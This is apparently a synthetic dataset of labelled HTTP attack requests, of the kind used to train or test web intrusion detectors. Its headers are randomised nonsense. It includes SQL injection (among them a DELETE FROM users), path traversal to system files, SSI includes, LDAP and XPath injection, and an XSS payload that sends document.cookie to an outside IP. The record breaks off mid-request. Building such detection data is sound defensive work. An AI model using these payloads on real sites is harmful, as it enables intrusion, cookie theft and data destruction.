X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35725
Start - Id: 40671
class: SSI
GET /iCbEsOPk-burYFF/uadminetcBWoVO80aw0E/lhEaehfaOrmAyfthsvt.gif?hme2se=cde+services8%5BnhtaccesnpasswdadRnrEprocessing-instructionn&iI9ton=nk_H%40&jntlulewiyarn=%3C%21--+%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: www.f3lpcrg.org:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: hn-oeme;q=0.0
Cache-Control: no-store
Client-ip: 146.221.195.70
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="864"
Date: Mon, 26 Apr 10 23:31:34 CET
ETag: "@mxl29ew6yTgJ5nW"
Expect: 100-continue
From: taaslTl@7ntsatsanh.cz
If-Modified-Since: Fri, 20 Mar 09 08:23:22 UTC
If-Unmodified-Since: Mon, 14 Apr 08 15:48:29 CET
If-Match: *
If-None-Match: *
If-Range: "U54kFk7V4KnyUxW3W1O"
Max-Forwards: 26
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cd36dfAd
Range: 266226-,-04
Referer: http://www.eeeB9dat.de/YedrEe/ia2ei/qoeeelsl/raaseemt.exe
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: abzwa1 http://www.loan6ohy.fr
UA-CPU: MIPS
UA-Disp: 395,6940,8
UA-OS: Windows 98
UA-Color: color8
Via: 1.5 254.69.99.82, FTP/2.6 www.xTeEsm.jpg, 6.8 www.oezt.js
Transfer-Encoding: compress
Upgrade: m3ott/2.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40671
Start - Id: 35162
class: SqlInjection
POST /aechoinsertWo/1367httpYI/6d8BLzYpyPrZMMLjx1Oi.php4? HTTP/1.0
Content-Length: 331
Content-Language: aeogan
Content-Encoding: compress
Content-Location: http://www.ovtolB.biz/1eg5.ace
Content-MD5: bnpOY250bWJud21jdGltZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Jun 04 20:30:38 UTC
Last-Modified: Fri, 29 Oct 04 21:14:49 CET
Host: 186.142.68.184
Connection: close
Accept: audio/x-wav, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2822
Client-ip: 233.147.59.197
Cookie: nteu=44391075;natNitqg=nmm;up7t=2178091712
Date: Sun, 11 Jul 04 19:01:28 GMT
If-Modified-Since: Mon, 21 Aug 06 07:09:35 CET
If-Unmodified-Since: Tue, 10 Feb 09 14:19:19 GMT
If-Match: "NUg_u81tc@oOp2-6TtTn"
If-None-Match: "jzHpNuQ2VbUKjXJ"
If-Range: Thu, 06 Oct 05 04:02:13 UTC
Max-Forwards: 1053
MIME-Version: 2.2
Pragma: wgPh='2'
Proxy-Authorization: Basic cXRzZTpvcXBh
Authorization: idwar Ss5M78=odfinj
Referer: http://3wztgey.uk/E6iaei/oy1Ed0m/riUtfuic.dll
User-Agent: nvmtOawaH/8.2.7
UA-OS: Linux
Via: 5.2 www.gimvte.shtml:40474, 7.9 217.9.21.157
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st2e=ehaphkezunsawrs&8io2eo=l:asp&qrte2gOYo&d2OwQDLQKf=toifsfgEoeslmk&UD-G0Ulocation=cti3'/**/UNION/**/SELECT/**/wteOtiej/**/FROM/**/dba_users/**/WHERE/**/2j/**/like/**/'%25&DlimtonpRsedI=cie&qvt3st5ieaeafe=nhwatfsuosee&euAsttcorjp7w=56096504&Eril3ret=2&uKSHD@R2@xp_D@=mlr3stti&sn=1408

End - Id: 35162
Start - Id: 45254
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.idelreTJ.fr
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.5, windows-1251;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=44
Client-ip: 57.131.86.129
Cookie: hyTyuWttp=thye8nawtns?/3l;xQFSW=+rEgpisock_streamoa
Cookie2: $Version="34"
Date: Fri, 07 Jan 05 14:12:29 GMT
ETag: "l6UvzhoFlq__9RNYOSC"
Expect: 100-continue
From: ysntx@c2jdcq.uk
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Sun, 11 Dec 05 22:52:37 CET
If-Match: "fvMjyCNGhb0jgnEI"
If-None-Match: "EDSkN4indw7HasL1Vp3"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: i0dd qlhepevi=nmCnh
Range: -249,23568-43
Referer: http://www.uNnzaona.biz/ojPtmt/9wNe.exe
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 7.2; dh-hu; rv:4.4.5) Gecko/55307248
UA-CPU: 68000
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: identity
Upgrade: b9r/9.4
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45254
Start - Id: 40463
class: SSI
GET /ie93puesetdfMit3evx/pl_8nj@/4RCgLmy1tqQiCIR.jpg?nhnnap5or1t=3297683215&9olEheatssa1=mailels&ttZl6qTetQSd3t=mz3&eysnltxzmsH=pxRcexrselhs&psea=60798577&kKElocation2=8350&rkiaeesseeEocie=%3C%21--+%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&eNtOnp8hmsc=a%3Eeaq%24Osid&try2arptv=71115196&Fenou=locationr&Ak=iaia&9Lb=042201 HTTP/1.1
Host: 112.96.189.92:196
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-kr
Accept-Encoding: *
Accept-Language: 2ath6ne5-aS, tidu-8, F2ees5-ltetcUoh, qhai3bre-h
Cache-Control: no-store
Client-ip: 166.89.179.136
Cookie: oe4=8eaQrthhuo;nbweeieAiahgNib=2rtnbnjcOnie;Zrdnleiwiech7ni=ns2
Cookie2: $Version="35"
Date: Tue, 30 Mar 10 05:08:45 GMT
ETag: W/"CWkiioo0WdACHhp"
Expect: i9gds
From: npmo@pBctcq.com
If-Modified-Since: Mon, 07 Apr 08 19:17:43 CET
If-Unmodified-Since: Fri, 26 Jun 09 03:52:43 CET
If-Match: "CTBIw-FqG7doIUM"
If-None-Match: *
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 57
MIME-Version: 4.8
Pragma: y=2pFrMf
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest nc=9F10e1e0
Range: 6740-758,0802-
Referer: http://www.mndz3.st/oneat.pl
TE: trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 5.8; 2m-o9; rv:2.8.4) Gecko/67211116
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: FTP/1.0 180.190.234.99, HTTP/8.6 23.149.137.243
Transfer-Encoding: identity
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 197.226.53.190
X-Serial-Number: 98565372421828
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40463
Start - Id: 49681
class: XPathInjection
GET /48uf8v4l/3pld/7S4sB2cB1XSS/fs0h5daranbnoemc/aB/eciecinhg.jpeg?AYdgsoscawd4yeo=64+++or++1%3C+++++g4%2F9l%2Fq%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D82%5D+or+9%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 89.207.34.178:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: eoiIMm-Ran7Kme;q=0.0, amit-olarve, o6dsN-c, gdihor5-hs8tleee;q=0.1, h2nrib-XE;q=0.4
Cache-Control: max-stale
Client-ip: 143.153.106.190
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="495"
Date: Wed, 01 Mar 06 17:02:22 GMT
ETag: W/"T-VtSnkF-ZadA0w02nc"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Sun, 24 Aug 08 20:56:34 GMT
If-Unmodified-Since: Sun, 24 Jun 07 16:33:29 CET
If-Match: "agX@4xEjR.B_x3b"
If-None-Match: *
If-Range: *
Max-Forwards: 3499
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://www.egiHtCap.fr/rdihis/iIehoD/Chq6/pnnt.asp
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: ns-jy1O http://www.pith.com
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 8.3 134.199.183.150:152
Transfer-Encoding: deflate
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49681
Start - Id: 42005
class: SqlInjection
GET /slydse/0tLUGztUbjvXY1S00k/oogarrntEeiss2nlst/W4ij/oim.htm?ywuiveh=aiateleitomi0riol&hC8=csceb36vbH&taopTvun5seW4he=OR+++%27stz1%27++++%3D+++++%27Sim%27%2B%27ple%27&wthzbdeYpnon2tc=ybH%3Crhn%29z&mqausehr6nm=n8PjCAyHCaY&TbMU4qBf=m%5Dqg2cv HTTP/1.0
Host: 187.243.110.111:05856
Connection: keep-alive
Accept: video/mpeg;q=0.0, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 11.178.28.161
Cookie: tHt=4ihwnarme;nrIre=hAlarnveokppAT
Cookie2: $Version="53"
Date: Mon, 07 May 07 10:50:29 GMT
ETag: "B3glT-8JF-SL@BPzG.S"
Expect: 100-continue
From: ainlfaqa@smAa.fr
If-Modified-Since: Wed, 07 Jan 09 23:58:03 GMT
If-Unmodified-Since: Mon, 31 Jan 05 04:25:35 CET
If-Match: *
If-None-Match: "yCrHjkz3RK0Ko@R3q@8f"
If-Range: "Xcmyx0xVsmAz@Qccutw"
Max-Forwards: 2
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://isakaar.it/fhanns/siciu/5Ootemf/uehr.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/6.9 (compatible; MSIE 5.1; Win98; bgyseeoehe; MQgo; uknOeeme)
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0057x268
Via: FTP/9.8 105.141.38.138, FTP/7.0 www.n84eo.jpg, aoes/7.9 157.25.201.241:58100
Transfer-Encoding: gzip
Upgrade: t4mmtm/8.9
Warning: 121 22.200.97.26 "twpjsNrt8hrjewaaYr" "Mon, 31 Aug 09 13:18:28 GMT"
X-Forwarded-For: 53.133.215.134
X-Serial-Number: 063116688396663
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42005
Start - Id: 45389
class: PathTransversal
POST /rA5RluQxLXY2OC5k.V/3JuzOCGlbXSzz_6kN3z/kzecdews/nJ58RX4kvRMRiUca_CQn.php4? HTTP/1.0
Content-Length: 263
Content-Language: n0tpi,0ahsws,aec
Content-Encoding: gzip
Content-Location: /dEergwlb/aoi4.doc
Content-MD5: OGVzcnN4bnVuaHllNGN0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 May 06 23:05:40 GMT
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: 62.243.84.39:33200
Connection: 7anr
Accept: text/html;q=0.4, text/html;q=0.1
Accept-Charset: x-mac-hebrew;q=0.7, iso-8859-7, cp-932;q=0.6, x-mac-korean
Accept-Encoding: deflate, compress, identity
Accept-Language: *;q=0.5
Cache-Control: l='eeazoht'
Client-ip: 2.231.241.65
Cookie: 4elkooEnbhlhrA=5849591
Cookie2: $Version="7"
Date: Sat, 10 Jun 06 23:09:05 UTC
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: oepa
From: dr4hcedC@tene.com
If-Modified-Since: Mon, 23 May 05 19:11:08 CET
If-Unmodified-Since: Thu, 01 Mar 07 07:46:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 831
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: w5rt tanRog=ltsbt
Range: 49-
Referer: /eors6rf/cebwp.mspx
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: a5atg (hUlBkXzQb_)
UA-CPU: MIPS
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: FTP/7.6 246.12.59.61, ffd/6.1 www.n9a89k.png, FTP/6.7 www.eby2op8y.tiff:928
Transfer-Encoding: deflate
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 611 158.221.222.98 "nfsr5r0ueesqlqn" "Wed, 02 Mar 05 08:12:12 CET"
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ut7xrorte4a=376240222&SfkxoolZsARt=3kdltMn$i7lsti &httastLe=oAttmpxml>s0kasrcobh&no=4&fR1rbFa=1518&JdL6T-=? (9=&weoPeAr2rdB=r+a+v&taius=\autoexec.bat&Ibtfrchncsnee2R=between;haWyexmls aeikn&dtf8m4qeEthEnA4=zw&dgtsdmn=27&tEese8e5dy1COr1=io;nfst

End - Id: 45389
Start - Id: 48080
class: XSS
GET /sDdmW./8_W_ZprFm3XMLr_/4KzcJz8wEuh6h/tLb-s1Yx-sk/paaa/dIunI9HyZA4ZJ/pFRyWZin_dgvo/s4ezNerfue/e6Lb54Gcl/h8KUsEOG82NL6VMPIt2.gif?Tbq5=08438&elattntmrsicd=%3Cimg+++++src++++%3D%22++annaraolla%3E+%22+++++onmouseover%3D+++%22+%5Balert++%28%278je%27%29%3B%5D+++++%22+%3E&lfnailtu2=03&btni7o=361563 HTTP/1.0
Host: www.hbnmet1qxn.ch
Connection: close
Accept: video/mpeg;q=0.4, text/*
Accept-Charset: cp-932;q=0.3, iso-8859-4;q=0.9, x-mac-chinesesimp;q=0.1
Accept-Encoding: compress;q=0.4, identity;q=0.5, gzip;q=0.2, deflate, identity;q=0.3
Accept-Language: w-aioeplch;q=0.7, ntd-1a2test
Cache-Control: max-stale
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="5"
Date: Wed, 11 Jun 08 23:02:46 GMT
ETag: "U9-YQ6G4Lm_.cAH"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 12 Jul 08 18:49:49 CET
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: "78vwAGbDNFfLif_UkWJ"
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: *
Max-Forwards: 25
MIME-Version: 2.5
Pragma: hroea5r=rbt6
Proxy-Authorization: NTLM ZXR0eWNlYWNlcmNHZ2dsZU95ZWJpcnNobk93aDZ6aThldGZudG4=
Authorization: Rucfn yksNds=e8tWg
Range: 353-,42-,174-
Referer: http://sbEa0m.cz/lenee.cfm
TE: trailers
Trailer: Referer
User-Agent: ewz6TJAbh http://www.tTZdddu.com
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 7.0 www.tsat.htm, 4.6 www.lh03.css
Transfer-Encoding: compress
Upgrade: urlbSi/7.2, soAe/2.2, syle/8.0
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48080
Start - Id: 45428
class: PathTransversal
PUT /4fb/af4U/puwxLLSselect/wktehorxfunobh8go0/8SphpgVo/fy6yy0WC3i4v/QpEnGi/6GckLV/srr/bA@Euygy6vHbM/seefcrsitootEesed2.css? HTTP/1.0
Content-Length: 250
Content-Language: oriEetth,njoetyt
Content-Encoding: identity
Content-Location: /akrlrAq/eeeyef.msf
Content-MD5: cHNvanN0czN4VHJhaDV5Sw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Thu, 19 Oct 06 21:17:24 GMT
Host: www.ihaol3h3Wd.com:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.25.110.183
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="494"
Date: Sun, 07 Jan 07 05:03:31 CET
ETag: "E9aSJidHKf9vumYs"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 09 Sep 08 20:37:52 UTC
If-Unmodified-Since: Sat, 03 Mar 07 15:23:10 GMT
If-Match: "3@TpBQBkFB@3ZsxF"
If-None-Match: "b_EsV_ytGyaG@wdzjv"
If-Range: Fri, 12 Aug 05 22:25:58 UTC
Max-Forwards: 93
MIME-Version: 4.4
Pragma: o1rsU=thle
Proxy-Authorization: Digest nc=F3B4A20E
Authorization: Kbobmp ele8=vlAT2
Range: -292636,082693-
Referer: http://nut4.net/eosgmeeI/traeeH.css
TE: gzip;q=0.5,deflate,trailers
Trailer: If-None-Match
User-Agent: telii (f2i9Na8A; dJLplr; eQW3q7yoEE)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: 8.5 www.m6dnesI.shtml:4938, 3.8 www.heu3kora.png, 9.3 www.euebVoe.png
Transfer-Encoding: ocene; heml=hermhp
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 685 www.notm7.js "acehl3taE" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

leee6HpsLhu=6rR =iee&gheroms=7851&6seeegddnte=l connect&geas=jnq&dlsnrz1e=170425&uxnt=../../../../../../WINNT/autoexec.bat&rre=oraoz//da&ea0e5iedr=fseoe ]wsystemrmol2&oIecFD=729099&R59t-LSj8V8=79&q4oUBYIZ=2786&xTx4io=OeT8rlogsps

End - Id: 45428
Start - Id: 47538
class: XSS
GET /gcW4y02Mg/gmv5c4/cthUpi4/xntsaktnupPnilhm/PI/pUGTavbscript4AlyQ/eXMbI6Ep8kF/s.r2.pl?wjta50las=a&oxEl8U4diaHg=t0UftguaRwot&a0lzsttguprco=hFxK2Rlt%40e&i89amai=3dseeeitx&jFceue=%3C%21--+--+--%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F197.212.156.63%2Fetit.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&as=mEenEisi6&camh2eeOog=%7Ceae&s2uhoto=904&6Tn0rmutYNlty=14156587&eFcouwe0erbqih=tu%29t+%5Bsi+s+&ron=rckhe HTTP/1.0
Host: www.srfecirc.biz
Connection: adas
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, gzip;q=0.4, compress, compress, compress;q=0.8
Accept-Language: t-0d;q=0.0
Cache-Control: min-fresh=38025
Client-ip: 37.55.220.136
Cookie: dmreo=eLecu;52blc9lb8nessid=i%rv
Cookie2: $Version="61"
Date: Sun, 29 Jan 06 12:18:29 UTC
ETag: "_JQz@6_kdlKXmlwio3"
Expect: pnInt
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Tue, 26 Jan 10 19:58:02 CET
If-Match: *
If-None-Match: "NZPJFprBlQpkBW-ma"
If-Range: "zbD6bwp@EhO9Zn0"
Max-Forwards: 2
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM dGx0ZGViczZjR2lwUjhibmlPc3RybGV4dEZldGFycmpvVGhuag==
Authorization: bMhsg esQt=Vnate6
Range: 8094-,77-91254,-8945
Referer: http://e1nxeL.it/Eieermih/iteMfn.conf
TE: trailers,chunked;q=0.2,trailers
Trailer: TE
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 4.1; Oe-h7; rv:5.6.8) Gecko/57951162
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47538
Start - Id: 38894
class: LdapInjection
GET /npxKHZ/@sMMHstdinMe-BBCI.jsp?BZjD2K-6like=Atuvs%26+7pqtt&rA8nehesoos=pho&euassalytlfRa=-mn&rztaasteetiw=MNi3D%29%28%26%28objectClass++++%3D++nIi*%29&efh=3304&rrdDhS3tr=ixqxb&bmnABVrmMqonz=2itoawtn-h&GRZcNQselect=ieuhMher9t&no=tDCGj&amhsanvxmrz=0591&ea=eanThdirr-kd HTTP/1.1
Host: 54.58.47.197
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: V3hwrh7-irv2ez, dy-eaed0ih;q=0.7, ogfiaboy-lEyVWe1;q=0.1
Cache-Control: no-transform
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="5"
Date: Sun, 25 Nov 07 05:04:16 UTC
ETag: "R0O7NP@sgmUcpkY8"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 19 Nov 08 04:45:55 GMT
If-Unmodified-Since: Sat, 09 Oct 04 11:06:22 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Nov 07 13:45:51 CET
Max-Forwards: 479
MIME-Version: 0.3
Pragma: yicbeptm='wt'
Proxy-Authorization: Digest username="woEv"
Authorization: Basic bjI1am9McjpueVRTZEhj
Range: 15934-,799-8058,-81465
Referer: http://www.e3iiah.com/Oeysk/iA4de.gif
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: jttu (yE31.P; e..lAsIyDc; obbr2TWN6s; rzfP1VVR)
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: t3anmi/9.0 www.lwoel.shtml, 6.3 248.250.151.200
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 032 37.94.166.93 "nimuhnatar" 
X-Forwarded-For: 250.105.147.78
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38894
Start - Id: 36057
class: PathTransversal
GET /sZk_JvGxHtXl9xc/ikSiFvI-cAsA3bByz/9QtL_cqQ.asmx?idONF@shutdownTc@0u=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&lzga6ewu=+2kb HTTP/1.1
Host: www.aiws5.ch
Connection: nwdc
Accept: application/postscript, application/*, audio/*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: e-sie;q=0.2, b-eae1tlnm;q=0.1, 5A8-ofhtysi;q=0.3, 1nhtol-cuaoUs
Cache-Control: no-store
Client-ip: 67.249.93.38
Cookie: orrQsaiu3=mrinnlbxsvcnpfB;isgrT=480840097;JmD8H4mA_4Tshutdown=1939
Cookie2: $Version="79"
Date: Sun, 05 Dec 04 08:33:21 UTC
ETag: W/"uHw4nlcHQ8W74qHyy"
Expect: 100-continue
From: Odatte@nazuaen.net
If-Modified-Since: Tue, 11 Jan 05 15:42:30 GMT
If-Unmodified-Since: Tue, 27 Oct 09 15:27:39 UTC
If-Match: "gmE.laLeS_yOTUER8v"
If-None-Match: *
If-Range: Sat, 20 Feb 10 23:18:38 CET
Max-Forwards: 76
MIME-Version: 5.0
Pragma: ti0='t'
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -676,1810-88717,49-
Referer: http://snus5d.uk/ttuorte.gif
TE: gzip
Trailer: Warning
User-Agent: ajasaMdogeiAk
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.3 8.9.78.53:22, HTTP/0.0 252.195.190.33
Transfer-Encoding: identity
Upgrade: ndmi/3.1, iziw/1.4
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36057
Start - Id: 36965
class: LdapInjection
GET /dhsdyeha67il/ho99ksIrooslh/hkDVrbigdADHJLY4/sTON5GF7@pWG/p8aeuoas2bge/2BI2C/nltrrc/p97t0.x8N@m-zI/d3EdeeT.mdb?ggaYrpumdmti=615&nohi=%25+e&bomhieuargsc=meprorsehyOOdhstyle&ht=%29+++%28++++%7C%28+++cn%3D*o++%27brien*++++%29%28mail+%3D*o++++%27brien*%29&prdnnscagasgrne=emAI&bneto9C=tvcmdhaROsa57M%3Fc HTTP/1.0
Host: 30.47.120.47
Connection: keep-alive
Accept: application/*;q=0.7, video/*
Accept-Charset: cp-932, iso-8859-1, windows-1254, us-ascii;q=0.2, iso-8859-4;q=0.5
Accept-Encoding: deflate;q=0.3, deflate;q=0.8, gzip;q=0.8
Accept-Language: ea0slapi-h2stn1;q=0.5, twpuh10-ooTiivna;q=0.9, 3hs-s;q=0.5, Nas9ze-zfOo, mlnoa-rnvo
Cache-Control: no-store
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Tue, 22 Sep 09 14:50:09 CET
ETag: W/"0hNPjWgcQZJH5il"
Expect: 9pthrt4s=irio1g;sAsnfse=eecs
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 09 Sep 06 05:08:04 UTC
If-Unmodified-Since: Sat, 13 Dec 08 05:44:59 GMT
If-Match: "jnoR5LVJtg85G99Y@r"
If-None-Match: "b81RCllo4JeISay"
If-Range: "OVMr9-OzY7J9JDNuycr"
Max-Forwards: 27
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: /aeeei/rawGdeW.asp
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: lpKO.TM http://www.ssnwtB.ch
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: voikit/1.2
Warning: 264 www.has1.jpeg "m9ht684a" "Tue, 19 May 09 18:23:26 CET"
X-Serial-Number: 36508239
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36965
Start - Id: 41177
class: SqlInjection
GET /eOtHihhe9rlrsO/dm5aut/PptIxI7q/fq4z_5sUxFX9QC7NT3LZ/oU1/kZ.shtml?aenaTlo9n=lz3KbfQhk9W&rHa2Q95ddeiavf=98&hletoVs=1&Iiods9m=60993&sltoiofessnerIo=xpassthrurmxp_goeaaat&mluwtrstaeat=wa&3htwseslhdrqat=dro&1roP=Petanetsoiih HTTP/1.1
Host: www.meIii.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: nlqane' );     DELETE     FROM    users     WHERE  upper(username)    =  upper( 'admin
